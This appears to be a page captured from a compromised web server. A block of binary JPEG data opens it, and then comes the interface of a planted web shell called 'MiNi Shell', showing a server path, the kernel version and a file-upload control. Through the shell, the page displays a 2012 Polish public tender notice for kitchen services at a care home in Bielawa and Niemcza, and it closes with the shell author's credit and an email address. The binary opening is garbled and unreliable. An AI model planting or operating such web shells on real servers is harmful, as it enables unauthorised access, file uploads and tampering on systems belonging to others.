JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120508/101785-N-2012.html

<p class="kh_header"><b>Bielawa: prowadzenie kuchni dla mieszkańców Domu Pomocy Społecznej w Bielawie i filii w Niemczy</b><br>
<b>Numer ogłoszenia: 101785 - 2012; data zamieszczenia: 08.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Żeromskiego 2, 58-260 Bielawa, woj. dolnośląskie, tel. 074 8334131, faks 074 8334131.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.pow.dzierzoniow.pl/pl/bip/jednostkiorganizacyjne/sluzbazdrowia/dpswb</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> prowadzenie kuchni dla mieszkańców Domu Pomocy Społecznej w Bielawie i filii w Niemczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest:
a) Przygotowywanie  całodziennego wyżywienia dla 125 mieszkańców DPS, które obejmuje odpowiednio:
					w Niemczy			w Bielawie
śniadanie				na godz.8.00		 	 8.00
obiad					na godz.12.30		  	12.30
podwieczorek  			na godz.15.30			15.00
kolację				na godz.17.30		  	17.30

dla 76 mieszkańców w DPS w Niemczy i dla 49 w Bielawie z  uwzględnieniem norm żywieniowych  kaloryczność ok. 2300 kcal, które obowiązują przy żywieniu osób starszych t.j. wg norm żywienia dla ludności w Polsce opracowanych pod redakcją  prof. zw. dr hab. n. med. Światosława Ziemiańskiego.
Ilość posiłków, diet  wymienionych poniżej, przygotowywanych kanapek, ilości dodatkowego mleka  może ulec zmianie. Jest to uzależnione od ilości mieszkańców przebywających w obu Domach oraz od stanu ich zdrowia, wskazań lekarskich  i bieżących  potrzeb.

	b. Przestrzeganie dziennej racji pokarmowej produktów spożywczych.

	c. Przygotowywanie posiłków świątecznych w okresie Świąt Wielkanocnych i Bożego 
                Narodzenia (w oparciu o jadłospisy do wglądu).

	d. Sporządzanie dekadowych jadłospisów wg wskazanego wzoru i przedkładanie ich do zatwierdzenia lekarzowi oraz Dyrektorowi Domu w terminie co najmniej 3 dni przed datą realizacji.
Jadłospis winien zawierać gramaturę wszystkich potraw oraz kaloryczność wszystkich posiłków.
Pełna odpowiedzialność za sporządzone jadłospisy spoczywa na wykonawcy zamówienia.

	e. Codzienne wywieszanie jadłospisu na dzień następny wg załączonego wzoru.
W jadłospisach oprócz diety normalnej należy uwzględnić diety w zależności od zgłaszanych potrzeb : cukrzycową, bezbiałkową, woreczkowo-wątrobową,  lekkostrawną, bogato białkową, niskokaloryczną, wysokokaloryczną, przecieraną, mix, żołądkową, cukrzycowo-wątrobową, ziemniaczaną, krótkotrwałe diety na zlecenie np. kleikową, półpłynną.                                                            W jadłospisach należy uwzględniać owoce cytrusowe oraz jogurty.
 
Informacyjnie podajemy średnią miesięczną ilość osobodni w Bielawie i Niemczy w rozbiciu na poszczególne diety (poza dietą normalną), liczoną z ostatnich 6 miesięcy.

                                               Bielawa			Niemcza
- bezsolna					   10
- bezmleczna				 127								
- cukrzycowa	                          352				   450
- wątrobowo-żołądkowa						               690			 
- woreczkowo - wątrobowa		30
- przecierana (mix)		        328				   150
- lekkostrawna				180 				

	f. Codzienne przygotowywanie kanapek na śniadanie i kolację dla  osób leżących w ilości dla 25 osób  w Bielawie oraz  30 osób w Niemczy wliczanych do ogólnej liczby żywionych tj.125 osób.

	g. Codzienne podawanie dodatkowego
-  mleka dla 6 osób w Bielawie i  10 osób w Niemczy, po 0,25 l  na osobę  na zlecenie lekarza,

	h. Uwzględnianie wzbogaconej diety dodatkowe posiłki dla 2 osób w Bielawie i 2 w Niemczy ogółem dla 4 osób będących na diecie  cukrzycowej, zgodnie z wymogami żywieniowymi.

	      i. Porcjowanie posiłków oraz pełna obsługa kelnerska na terenie jadalni DPS w Niemczy i Bielawie, a także pełna obsługa kelnerska na II piętrze w Niemczy oraz  parterze w Bielawie pojedyncze przypadki obsługi kelnerskiej na pozostałych piętrach należeć będą do personelu DPS,

            j. Zmywanie i wyparzanie naczyń,

	k. W przypadku wyjazdów mieszkańców na wycieczki, przygotowywanie zamiennie suchego  prowiantu. W ramach suchego prowiantu muszą znaleźć się ciepłe napoje w termosach.

	l. Przygotowywanie w upały do dyspozycji mieszkańców w jadalni i na korytarzach   zwiększonej ilości kompotu, herbaty, czarnej zbożowej kawy, mięty. 

	m. Zabezpieczenie w jadalniach w obu Domach na bieżąco do dyspozycji mieszkańców: masła, chleba, dżemu, miodu, herbaty, mięty.
	
	2.    Wykonawca zobowiązany jest do:
	a. Przygotowywania posiłków  na terenie kuchni DPS w Niemczy i kuchni w Bielawie z użyciem sprzętu DPS będącego w jego posiadaniu.
Nie dopuszcza się podawania gotowych, porcjowanych posiłków, zapakowanych hermetycznie, o długim terminie przydatności do spożycia -  do podgrzania w kuchni mikrofalowej.
Posiłki powinny być świeże, codziennie gotowane. W chwili obecnej sprzęt będący własnością DPS użyczony obecnemu Wykonawcy jest sprawny. . Brakujący sprzęt, a nieodzowny do wykonania zadania, Wykonawca zabezpieczy w swoim zakresie  między innymi w  zastawę stołową, sztućce. Sprzęt zakupiony przez Wykonawcę w trakcie realizacji zadania, po jej zakończeniu pozostaje własnością Wykonawcy.  
Pomieszczenia kuchni nie wymagają modernizacji. Posiadają pozytywną opinię  Straży Pożarnej oraz aktualne badania elektryczne i badania szczelności instalacji gazowej.

	b. Ponoszenia kosztów zużycia wody, gazu, energii elektrycznej oraz ogrzewania.
Stan techniczny liczników wody, energii elektrycznej, gazu  jest dobry.
W związku z brakiem możliwości  zainstalowania liczników  na energię, wodę i gaz w DPS w Bielawie podajemy szacunkowo koszty ponoszone za te media tj. 572,00 zł miesięcznie netto.
Koszty mediów w Niemczy netto z ostatnich 6 m-cy

M-c				Energia			Woda				
XI 2011			376,80			46,00		
XII				376,80			46,00		
I 2012			442,40			46,00			
II				341,20			40,25		
III 				370,80			34,50
IV				350,40			34,50			
Koszt zużycia gazu średnio 350 PLN m-c.
Wykonawca, który zostanie wybrany w postępowaniu przetargowym  winien zainstalować własne liczniki na energię elektryczną. lub rozliczyć się z poprzednim Wykonawcą. Kwota do zwrotu poprzedniemu Wykonawcy wynosi 1000,00 zł netto.  

	c Utrzymania czystości pomieszczeń, sprzętu itp. wykorzystywanych przez Wykonawcę oraz czasowej ich konserwacji oraz konserwacji pomieszczeń będących w dzierżawie Wykonawcy.

	d. Odbioru i utylizacji odpadów pokonsumpcyjnych. 

	3. Wykonawca będzie ponosił odpowiedzialność za:
	a. stan techniczny i sanitarny dzierżawionych pomieszczeń,
	b. stan i ilość dzierżawionych maszyn i urządzeń oraz drobnego sprzętu kuchennego.


Zaleca się aby Wykonawca przeprowadził wizję lokalną obu kuchni, koszty takiej wizyty ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy, że posiada odpowiednią wiedzę i doświadczenie przy realizacji robót objętych niniejszym zamówieniem.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców - dotyczy wykonawców łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy, że posiada odpowiedni potencjał techniczny zapewniający wykonanie zamówienia.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców - dotyczy wykonawców łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca dysponuje osobami zapewniającymi wykonanie przedmiotu zamówienia.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców - dotyczy wykonawców łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy, że znajduje się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wykaz zatrudnionych osób pełnione funkcje, ilość osób, wykształcenie przeznaczonych do wykonania tego zadania,
- kserokopia dyplomu dietetyka lub technologa żywienia, który będzie uczestniczyć w wykonaniu zamówienia.
- wykaz prac prowadzenie kuchni w żywieniu zbiorowym zrealizowanych  w ciągu ostatnich 3 lat jeżeli okres prowadzenia działalności jest krótszy - za ten okres z podaniem wartości tych prac, daty realizacji  i nazwy zamawiającego, zgodnie z  załącznikiem do oferty wraz z dokumentami, że prace wymienione w wykazie zostały wykonane należycie np. zaświadczenia, referencje i.t.p.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pow.dzierzoniow.pl/pl/bip/jednostki_organizacyjne/sluzba_zdrowia/dpswb/przet_ogl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej ulica Żeromskiego 2, 58-260 Bielawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2012 godzina 09:00, miejsce: Dom Pomocy Społecznej ulica Żeromskiego 2, 58-260 Bielawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com